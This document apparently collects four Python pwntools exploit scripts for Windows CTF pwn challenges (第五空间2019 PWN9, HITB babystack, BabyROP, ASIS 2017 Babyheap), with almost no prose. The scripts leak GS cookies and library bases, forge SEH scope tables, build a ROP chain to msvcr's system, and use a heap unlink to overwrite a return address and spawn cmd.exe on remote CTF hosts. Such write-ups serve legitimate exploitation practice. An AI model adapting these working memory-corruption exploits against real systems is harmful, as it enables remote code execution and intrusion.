[Windows][第五空间2019 决赛]PWN9
exp:

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

# context.log_level = 'debug'
context.arch = 'i386'

p = remote('192.168.0.100', 2222)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def get_value(address):
    p.recvuntil('Do you want to know more?')
    p.sendline('yes')
    p.recvuntil('Where do you want to know')
    p.sendline(str(address))
    p.recvuntil('value is ')
    value = int(p.recvuntil('\n', drop=True), 16)
    return value
"""
void __cdecl ValidateLocalCookies(void (__fastcall *cookieCheckFunction)(unsigned int), _EH4_SCOPETABLE *scopeTable, char *framePointer)
{
    unsigned int v3; // esi@2
    unsigned int v4; // esi@3

    if ( scopeTable->GSCookieOffset != -2 )
    {
        v3 = *(_DWORD *)&framePointer[scopeTable->GSCookieOffset] ^ (unsigned int)&framePointer[scopeTable->GSCookieXOROffset];
        __guard_check_icall_fptr(cookieCheckFunction);
        ((void (__thiscall *)(_DWORD))cookieCheckFunction)(v3);
    }
    v4 = *(_DWORD *)&framePointer[scopeTable->EHCookieOffset] ^ (unsigned int)&framePointer[scopeTable->EHCookieXOROffset];
    __guard_check_icall_fptr(cookieCheckFunction);
    ((void (__thiscall *)(_DWORD))cookieCheckFunction)(v4);
}

int __cdecl _except_handler4_common(unsigned int *securityCookies, void (__fastcall *cookieCheckFunction)(unsigned int), _EXCEPTION_RECORD *exceptionRecord, unsigned __int32 sehFrame, _CONTEXT *context)
{
    // 异或解密 scope table
    scopeTable_1 = (_EH4_SCOPETABLE *)(*securityCookies ^ *(_DWORD *)(sehFrame + 8));

    // sehFrame 等于 上图 ebp - 10h 位置, framePointer 等于上图 ebp 的位置
    framePointer = (char *)(sehFrame + 16);
    scopeTable = scopeTable_1;

    // 验证 GS
    ValidateLocalCookies(cookieCheckFunction, scopeTable_1, (char *)(sehFrame + 16));
    __except_validate_context_record(context);

    if ( exceptionRecord->ExceptionFlags & 0x66 )
    {
        ......
    }
    else
    {
        exceptionPointers.ExceptionRecord = exceptionRecord;
        exceptionPointers.ContextRecord = context;
        tryLevel = *(_DWORD *)(sehFrame + 12);
        *(_DWORD *)(sehFrame - 4) = &exceptionPointers;
        if ( tryLevel != -2 )
        {
            while ( 1 )
            {
                v8 = tryLevel + 2 * (tryLevel + 2);
                filterFunc = (int (__fastcall *)(_DWORD, _DWORD))*(&scopeTable_1->GSCookieXOROffset + v8);
                scopeTableRecord = (_EH4_SCOPETABLE_RECORD *)((char *)scopeTable_1 + 4 * v8);
                encloseingLevel = scopeTableRecord->EnclosingLevel;
                scopeTableRecord_1 = scopeTableRecord;
                if ( filterFunc )
                {
                    // 调用 FilterFunc
                    filterFuncRet = _EH4_CallFilterFunc(filterFunc);
                    ......
                    if ( filterFuncRet > 0 )
                    {
                        ......
                        // 调用 HandlerFunc
                        _EH4_TransferToHandler(scopeTableRecord_1->HandlerFunc, v5 + 16);
                        ......
                    }
                }
                ......
                tryLevel = encloseingLevel;
                if ( encloseingLevel == -2 )
                    break;
                scopeTable_1 = scopeTable;
            }
            ......
        }
    }
  ......
}
"""
ru("= 0x")
stack = int(p.recvuntil("\n")[:-1],16)
lg("stack",stack)
ru("= 0x")
main_addr = int(p.recvuntil("\n")[:-1],16)
lg("main_addr",main_addr)
security_cookie = get_value(main_addr+0x404004-0x4010b0)
# lg("security_cookie_addr",main_addr+0x404004-0x4010b0)
lg("security_cookie",security_cookie)
scopetable = stack+0x94
lg("scopetable",scopetable)
excepthandler = stack+0x90
next_ptr = get_value(stack+0x90-0x4)
lg("next_ptr",next_ptr)
ExceptionHandler = main_addr+0x1460-0x10b0
lg("ExceptionHandler",ExceptionHandler)

backdoor = main_addr-0x10b0+0x138D
fake_scope = [
    0x0FFFFFFEc, # GSCookieOffset -0x14
    0,           # GSCookieXOROffset
    0x0FFFFFF20, # EHCookieOffset #-224
    0,           # EHCookieXOROffset 
    0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
    backdoor     # ScopeRecord.FilterFunc
]
ebp = stack+0x9c
fake_scope_addr = stack+0x10
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^security_cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^security_cookie) #scopetable
payload += p32(0) #try_level

p.recvuntil('Do you want to know more?')
p.sendline('nooo')
p.sendline(payload)
p.recvuntil('Do you want to know more?')
p.sendline('yes')
p.recvuntil('Where do you want to know')
p.sendline('0')
p.interactive()

[Windows][HITB GSEC]BABYSTACK

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

p = remote('node3.buuoj.cn',27300)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
ru("0x")
stack = int(p.recvuntil('\r')[:-1],16)
lg("stack",stack)
ru("0x")
main = int(ru("\r")[:-1],16)
lg("main",main)
def getaddr(addr):
    sla("OtherwhereWillBeTheAnswer\r\n","yes")
    sla("Where do you want to know\r\n",str(addr))
    ru("is 0x")
    return int(ru('\r')[:-1],16)
cookie = getaddr(main-0x1610b0+0x164004)
lg("cookie",cookie)
ebp = stack+0x9c
try_level = ebp-0x4
ExceptionHandler = getaddr(ebp-0xc)
lg("ExceptionHandler",ExceptionHandler)
next_ptr = getaddr(ebp-0x10)
lg("next_ptr",next_ptr)
backdoor = main+0x16138D-0x1610B0
lg("backdoor_addr",backdoor)
fake_scope = [
    0x0FFFFFFEc, # GSCookieOffset -0x14
    0,           # GSCookieXOROffset
    0x0FFFFFF20, # EHCookieOffset #-224
    0,           # EHCookieXOROffset 
    0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
    backdoor     # ScopeRecord.FilterFunc
]
fake_scope_addr = stack+0x10
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^cookie) #scopetable
payload += p32(0) #try_level
sla("OtherwhereWillBeTheAnswer\r\n","no")
sl(payload)
# getaddr(0)
p.interactive()

[Windows][Others]BabyROP

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

p = remote('node3.buuoj.cn',26336)
# p = remote("192.168.0.104",7777)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recvuntil("name")
p.sendline("A"*24)
p.recvuntil("A"*24)
crt = p.recv(4)
msvcr_base = u32(crt) - 0x16e2d
lg("msvcr_base",msvcr_base)
system_address = msvcr_base + 0x62632
cmd_address = msvcr_base + 0x43030

payload = "A"*0xCC+"AAAA"+p32(system_address)+p32(0xdeadbeaf)+p32(cmd_address)

p.recvuntil("input your message length")
p.sendline(str(len(payload)))
p.sendline(payload)
p.interactive()
#78ABD04D
#78B02632 system

[Windows][ASIS 2017]Babyheap

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *

# context.log_level = 'debug'
context.arch = 'i386'

# p = remote('node3.buuoj.cn',29886)
p = remote("192.168.0.104",2222)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
ru("0x")
codebase = int(ru("\r")[:-1],16)-0x1090
lg("codebase",codebase)
def cmd(idx):
    sla("choice?\r\n",str(idx))
def add(size,payload):
    cmd(1)
    sla("sword?\r\n",str(size))
    sla("it!\r\n",payload)
def edit(index, size, content):
    p.sendlineafter('choice?\r\n', '3')
    p.sendlineafter('polish?\r\n', str(index))
    p.sendlineafter('time?\r\n', str(size))
    p.sendafter('again : \r\n', content)
def free(idx):
    cmd(2)
    sla('Which sword do you want to destroy?\r\n',str(idx))
def show(idx):
    cmd(4)
    sla('Which one will you check?\r\n',str(idx))
for i in range(6):
    add(0x58, 'a'*0x20)

free(2)
edit(1,0x58,"a"*0x58+'\n')
show(1)
ru("a"*0x58)
header = u64(ru("\r")[:-1].ljust(8,"\x00"))
lg("header",header)
addr = codebase+0x4370
addr2 = codebase+0x43bc
# heaader = ru("S")[:-1]
# edit(1,0x58+0x8,"a"*0x58+p64(header)+'\n')
free(4)
edit(1, 0x58 + 8 + 8, 'b' * 0x58 + p64(header) + p32(addr + 4) + p32(addr + 8) + '\n')
free(1)
p.sendlineafter('choice?\r\n', '1337')
p.sendlineafter('target?\r\n', str(addr2+0x2))
payload = p32(addr2)+p32(addr)+p32(codebase+0x30c8)#4
payload += p32(0x300C+codebase)
edit(2,len(payload),payload+'\n')
edit(2,6,"\x01"*6+'\n')
show(4)
ru("how : ")
ucrtbase = u32(p.recv(4))-0xB89F0
lg("ucrtbase",ucrtbase)
sys_addr = 0xEFDA0+ucrtbase
cmd_addr = 0x15084+ucrtbase
show(5)
ru("how : ")
ntdll_base = u32(p.recv(4))-0x44160
lg("ntdll_base",ntdll_base)
ntdll_PedLdr_addr = ntdll_base+0x120c40
addr3 = ntdll_PedLdr_addr-0x34
edit(3,8,p32(addr)+p32(addr3)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,"\x00"))-0x21c+0x3000
# lg("stack_addr",stack_addr)
edit(0,8,p32(addr)+p32(stack_addr)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,'\x00'))
lg("stack_addr",stack_addr)
ret_addr = stack_addr & 0xffff00
ret_addr = ret_addr+0x5c
lg("ret_addr",ret_addr)
ret_addr_content = 0x193B+codebase
for i in range(60,100):
    edit(0,8,p32(addr)+p32(ret_addr+i*4)+'\n')
    show(1)
    ru("how : ")
    ss = u32(p.recv(3).ljust(4,'\x00'))
    print i
    # print "["+str(hex(ret_addr+i*4)) + "] :" + str(hex(ss))
    if ss == ret_addr_content:
        log.success("Success Found!")
        ret_addr = ret_addr+i*4
        break
lg("ret_addr",ret_addr)
s1 = p32(addr)+p32(ret_addr)+"cmd.exe\x00"
edit(0,len(s1),s1+'\n')
# show(1)
# ru("how : ")
# ss = u32(p.recv(3).ljust(4,'\x00'))
# lg("ss",ss)
# if(p.recv(4))
# edit(0,8,p32(addr)+p32(ret_addr)+'\n')
payload = [
    sys_addr,
    codebase+0x21AF,
    addr+0x4+0x4,
    0,

]

edit(1,16,flat(payload)+'\n')

cmd(5)
p.interactive()